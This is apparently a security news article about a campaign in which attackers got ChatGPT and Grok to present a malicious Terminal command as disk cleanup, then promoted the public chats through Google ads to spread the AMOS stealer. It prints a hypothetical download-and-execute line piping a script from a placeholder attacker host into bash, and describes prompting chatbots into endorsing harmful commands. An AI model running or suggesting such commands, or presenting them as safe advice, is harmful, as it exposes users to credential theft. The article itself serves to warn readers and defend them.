Hackers Use ChatGPT to Trick Mac Users Into Installing Stealer Malware


According to 9to5Mac, cybersecurity firm Huntress has documented a new attack in which hackers use ChatGPT and X’s Grok chatbot to trick Mac users into installing malware. The attackers created public conversations with the AI assistants that presented a malicious Terminal command as a “safe system cleanup” instruction for freeing up disk space. They then paid Google to promote links to these chats, ensuring they appeared at the top of search results for queries like “Clear disk space on macOS.” An unsuspecting user clicked the ChatGPT link, followed the friendly, step-by-step guidance, and executed the command. Doing so downloaded a variant of the “AMOS” stealer malware, which immediately harvested passwords, escalated privileges to root, and established persistence on the machine. The same lure worked via a Grok conversation as well, showing this is a reproducible abuse of AI platforms.


How the scam works

Here’s the thing: this is old-school social engineering with a terrifyingly modern twist. The hackers aren’t breaking into systems. They’re politely asking the victim to open the door for them. They start by having a conversation with ChatGPT or Grok, carefully crafting a prompt that gets the AI to present a dangerous Terminal command as helpful advice. Then, they make that chat public and buy a Google ad for the link. So when a frustrated user Googles a common problem—like how to free up space—they see what looks like a legitimate, authoritative result from ChatGPT itself at the very top of the page. The user trusts Google’s ranking and OpenAI’s or X’s brand. They click, see a normal-looking AI chat, and copy-paste the command. And just like that, they’ve bypassed every single macOS security gate because they manually executed the command themselves. It’s a brutal exploitation of trust in the entire tech stack: the search engine, the AI brand, and the user’s own desire for a quick fix.
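To make the red flag concrete, here is a hypothetical sketch of the pattern. This is not the actual command from the Huntress report, and the URL is a placeholder: the shape is a believable maintenance step up front, with a download-and-execute chained on behind it.

```bash
# Hypothetical illustration only -- not the command from the Huntress report.
# The URL below is a placeholder; the pattern is what matters.

# Looks like routine cache cleanup:
rm -rf ~/Library/Caches/SomeApp

# This is the part doing the damage: silently fetch a script the attacker
# controls and run it, which can then prompt for your password and hand the
# stealer root access.
curl -fsSL https://attacker.example/cleanup.sh | bash
```

The tell is the pipe into `bash` (or `sh`) from a URL you didn’t choose. No legitimate disk-cleanup advice needs your Mac to execute code fetched from a stranger’s server.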

Why this is so dangerous

This method is insidious because it weaponizes help. People turn to Google and AI for troubleshooting all the time. The instructions looked friendly and legitimate, hosted on the actual chat.openai.com domain. There’s no sketchy download link, no fake website. It’s just text in a chat window. How is a non-technical user supposed to know the difference between a safe `sudo` command and a malicious one? They can’t. And that’s the point. The malware installed, the AMOS stealer (Atomic macOS Stealer), is no joke. It grabs iCloud passwords, credit card details from browsers, and files. It gets root access, meaning it owns the system, and it sticks around. All from one copied line of text. It makes you wonder: what other “helpful” AI guides out there are actually traps?
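If you’re worried you may have already run something like this, one quick, read-only check is to look at what’s registered to launch automatically. Whether this particular AMOS variant persists via launch items is an assumption on my part (Huntress’ write-up has the exact indicators), but LaunchAgents and LaunchDaemons are the usual hiding spots for macOS persistence.

```bash
# Read-only: list everything registered to start automatically.
ls -l ~/Library/LaunchAgents /Library/LaunchAgents /Library/LaunchDaemons

# Inspect any entry you don't recognize before touching it, e.g.:
# plutil -p /Library/LaunchDaemons/suspicious-name.plist
```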

The broader trend and what to do

Sam Chapman at Engadget notes this is part of a growing trend of using AI to refine classic scams. Hackers are using AI to brainstorm better phishing lures, write more convincing copy, and now, to poison the very well of common knowledge—search results. So what’s the fix? The immediate lesson is painfully simple: never, ever paste a Terminal command you don’t fully understand. Sponsored results, even for trusted brands, are not a safe source. If you need tech help, go directly to official support documentation. But the bigger issue is for the platforms. Google, OpenAI, and X need to figure out how to police their public chats and sponsored links for this kind of weaponized content. Because right now, their systems are being used as the perfect delivery mechanism for malware. In the meantime, tell your less-techy friends and family. A quick warning could save them a world of trouble. It’s a reminder that in tech, as in life, if something seems too easy, it probably is.
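And for the specific lure used here, freeing up disk space, you don’t need anyone’s one-liner. A couple of built-in, read-only commands (or Apple’s own Storage settings) will show you what’s taking up room without deleting a thing.

```bash
# Read-only, no sudo, deletes nothing.
df -h /                                        # how full the startup volume is
du -sh ~/Library/Caches ~/Downloads ~/Movies   # size up the usual space hogs
```

From there, deleting anything is a decision you make yourself in Finder, not something a pasted command makes for you.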
